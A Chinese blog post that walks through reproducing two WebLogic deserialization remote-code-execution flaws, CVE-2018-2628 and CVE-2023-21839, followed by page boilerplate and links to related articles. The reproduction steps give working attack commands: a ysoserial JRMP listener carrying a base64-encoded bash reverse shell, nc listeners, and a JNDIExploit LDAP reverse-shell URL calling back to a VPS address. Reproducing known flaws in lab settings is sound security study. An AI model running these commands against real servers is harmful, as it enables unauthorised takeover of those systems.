WebLogic漏洞复现

最新推荐文章于 2025-02-25 11:12:10 发布
最新推荐文章于 2025-02-25 11:12:10 发布
阅读量1k 收藏 20
点赞数 18
文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/hot_milk1/article/details/136184467
版权
本文详细描述了OracleWebLogicServer中的两个安全漏洞,CVE-2018-2628和CVE-2023-21839,涉及反序列化远程代码执行(RCE)。文章介绍了漏洞原理、受影响的版本以及复现漏洞的过程,包括使用特定工具如WeblogicTool和ysoserial进行攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务器,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。

# CVE-2018-2628(反序列化、RCE)

# 介绍

WLS Core是其中的一个核心组件。攻击者利用其他rmi绕过weblogic黑名单限制,然后在将加载的内容利用readObject解析,从而造成反序列化远程代码执行该漏洞,该漏洞主要由于T3服务触发,所有开放weblogic控制台7001端口,默认会开启T3服务,攻击者发送构造好的T3协议数据,就可以获取目标服务器的权限。

影响版本:

  • Weblogic 10.3.6.0
  • Weblogic 12.1.3.0
  • Weblogic 12.2.1.2
  • Weblogic 12.2.1.3

# 漏洞复现

目标:http://139.159.221.73:37058/

工具:WeblogicTool 、ysoserial、vps服务器

  • 检测漏洞是否存在:

  • 漏洞存在!在vps上下载ysoserial.jar,启用JRMP
  • 开启监听端口。

由于Runtime.getRuntime().exec()中不能使用管道符等bash需要的方法,所以我们使用base64的反弹shell形式:

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 39170 CommonsCollections1 'bash -c {echo,反弹shell的base64编码}|{base64,-d}|{bash,-i}'

同时nc监听:

JRMP攻击:

成功反弹shell,复现完毕。

# CVE-2023-21839(反序列化、RCE)

# 介绍

WebLogic 存在远程代码执行漏洞(CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。

影响版本:

  • 12.2.1.2.0
  • 12.2.1.1.0
  • 12.2.1.3.0
  • 12.2.1.0.0
  • 12.2.1.4.0
  • 14.1.1.0.0
  • 12.1.2.0.0
  • 12.1.3.0.0
  • 10.3.6.0

# 漏洞复现

目标:http://10.128.6.148:7001

工具:WeblogicTool、JNDIExploit、vps服务器

版本:10.3.6.0

  • 漏洞检测

  • 漏洞存在,VPS开启JNDI监听,同时nc监听反弹shell端口
java -jar JNDIExploit-2.0-SNAPSHOT.jar -i 139.159.221.73 -p 9090

nc -lvnp 7777

  • 使用WeblogicTool向ldap服务发送反弹shell的exp:
ldap://139.159.221.73:1389/Basic/ReverseShell/139.159.221.73/7777

  • 反弹shell成功:

weblogic12c 漏洞 CVE-2018-2628补丁
07-23
2018最新weblogic反序列化漏洞补丁包 CVE-2018-2628补丁
python注解_python注解_python 注解_python注解方法 - 云+社区 - 腾讯云
weixin_39827304的博客
11-29 1013
广告关闭腾讯云11.11云上盛惠 ,精选热门产品助力上云,云服务器首年88元起,买的越多返的越多,最高返5000元!函数注解function annotations函数注解 python 3.5引入对函数的参数进行类型注解 对函数的返回值进行类型注解只对函数参数做一个辅助的说明,并不对函数参数进行类型检查 提供给第三方工具,做代码分析,发现隐藏bug 函数注解的信息,保存在__annotation...
vulfocus上的java反序列化漏洞复现
最新发布
2401_84223077的博客
02-25 256
使用利用工具。
weblogic漏洞
scu_hacker博客
01-17 4317
目录 前言 一、任意文件上传 1.1影响范围 1.2 漏洞详情 二、弱口令+后台war包 三、ssrf漏洞 3.1影响范围 3.2 漏洞详情 四、反序列化漏洞 总结 前言 weblogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器,本文介绍常见的几个weblogic漏洞原理、复现。 一、任意文件上传 1.1影响范围 weblogic 10.3.6.0 weblogic 12.1.3.0 weblogic 12.2.1.2 .
搭建WebLogic12.2.1.3.0(CVE_2018_2894 漏洞)的靶机
qq_44262210的博客
05-08 1525
安装配置JDK环境变量,安装配置WebLogic12,开放7001端口
weblogic 序列化漏洞 CVE-2017-10271 版本 12.1.3.0.0
01-23
weblogic 序列化漏洞 CVE-2017-10271 版本 12.1.3.0.0
weblogic漏洞复现
weixin_52374319的博客
06-21 710
4、查看ldap服务器,成功反弹shell。3、执行exp获取反弹shell。
Weblogic漏洞复现
m0_62392732的博客
12-21 639
Weblogic管理端未授权的两个页面存在任意上传jsp文件漏洞,进而获取服务器权限。 Oracle修复了Weblogic Web Service Test Page中一处任意文件上传漏洞Web Service Test Page 在 ‘生产模式’ 下默认不开启,所以该漏洞有一定限制。两个页面分别为/ws_utc/begin.do、/ws_utc/config.do。 3.4.2受影响版本 weblogic 10.3.6.0 weblogic 12.1.3.0 weblogic...
最新2018年7月WebLogic漏洞(CVE-2018-2893) 适用于weblogic12.2.1.3
07-23
Oracle的高危远程代码执行漏洞(CVE-2018-2893),通过该漏洞攻击者可以在未授权的情况下远程执行任意代码。 受此漏洞影响的版本包括: WebLogic 10.3.6.0 WebLogic 12.1.3.0 WebLogic 12.2.1.2 WebLogic 12.2.1.3 解决方案: 1.控制T3协议的访问 2.升级到 jdk-8u20以上的版本 3.升级补丁
weblogic 未授权命令执行漏洞(CVE-2020-14882复现
热门推荐
玄道的网安博客
10-29 1万+
简介 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。 漏洞概述 未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的 WebLogic Server 上执行任意代码。 影响版本 Oracle Weblogic Server 10.3.6.0.0 Orac...
Weblogic10.3.6补丁升级
weixin_53150440的博客
03-29 2497
Weblogic10.3.6补丁升级
Linux安装Weblogic 14.1.1.0.0保姆级教程
又菜又爱玩的小熊
04-03 1万+
WebLogic是一个Java应用服务器软件,WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
Oracle WebLogic Server 12c: Node Manager配置与使用
netyeaxi的专栏
08-25 8614
Oracle WebLogic Server 12c: Node Manager配置与使用 在生产环境中,WebLogic服务器实例经常会跨多个管理域(domains)、物理主机(machines)或地域(geographic locations)分开部署。如果你想知道怎样在不同的物理主机上安装和配置Node Manager,请阅读此文章。...
Weblogic漏洞(一)之 Weblogic基本介绍
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
08-26 1025
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。适用于大型商业项目。
Weblogic (12C) 概念与配置
朗晴的技术博客
01-18 1008
概念与配置
Apache
ZXT02的博客
04-16 371
Apache及其漏洞学习记录
WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839)
0xSec
02-11 5678
WebLogic存在远程代码执行漏洞,该漏洞允许未经身份验证的远程攻击者通过T3/IIOP协议网络访问并破坏易受攻击的WebLogic服务器,成功利用此漏洞可能导致Oracle WebLogic服务器被接管或敏感信息泄露。
weblogic学习视频
p3348577008的博客
12-16 1531
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 WebLogic是美商Oracle的主要产品之一
Oracle WebLogic12.2.1.3.0安装与配置(Windows)
风梧的博客
03-27 3222
1.下载软件WebLogic 下载地址:Oracle Fusion Middleware Software Downloads click here. 跳转到下面网页 得到一个压缩包: *压缩包的内容 2.安装 使用解压工具将【fmw_12.2.1.3.0_wls.jar】解压,得到内容如下: 进入此目录Disk1\install 双击".ng.cmd",运行脚本:(以管理员身份运行最好) 有任何手动修改,都会在对应配图下作文字说明! 2.1.软件安装步骤UI界面及操作与修改 2.1.1.
最新weblogic漏洞复现
01-10
### 关于WebLogic最新漏洞详情 针对WebLogic服务器的安全研究持续更新,最新的安全扫描服务能够检测已知的安全漏洞[^1]。然而,具体的WebLogic漏洞细节通常由专业的安全公告发布,并且会包含在诸如CVE(Common Vulnerabilities and Exposures)列表中。 对于获取最新的WebLogic漏洞信息,建议定期访问官方渠道如Oracle官方网站发布的安全警报和技术文档来了解最新的漏洞情况和修复方案。此外,一些开源平台也会提供关于这些漏洞的技术讨论和支持社区可以作为辅助资源。 需要注意的是,在合法授权范围内进行测试非常重要;未经授权对任何系统执行攻击性操作都是违法行为。因此,在学习或验证某个特定漏洞时,请务必确保拥有适当权限并遵循道德准则。 为了帮助理解如何负责任地处理此类信息安全问题,下面是一个假设性的Python脚本例子用于展示基本概念而非实际利用方法: ```python import requests def check_weblogic_version(target_url): try: response = requests.get(f"{target_url}/console/login/LoginForm.jsp", timeout=5) if "WebLogic Server Version" in response.text: version_info = response.text.split('WebLogic Server Version')[1].split('<')[0].strip() print(f"[+] Detected WebLogic Version: {version_info}") else: print("[-] Could not detect WebLogic server version.") except Exception as e: print(f"Error occurred while checking WebLogic version: {e}") if __name__ == "__main__": target = input("[*] Enter Target URL (with http/https): ") check_weblogic_version(target) ``` 此代码仅用于教育目的,展示了如何通过HTTP请求尝试识别目标站点上运行的WebLogic版本号。这有助于管理员确认其环境中的软件状态以便及时应用补丁程序。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值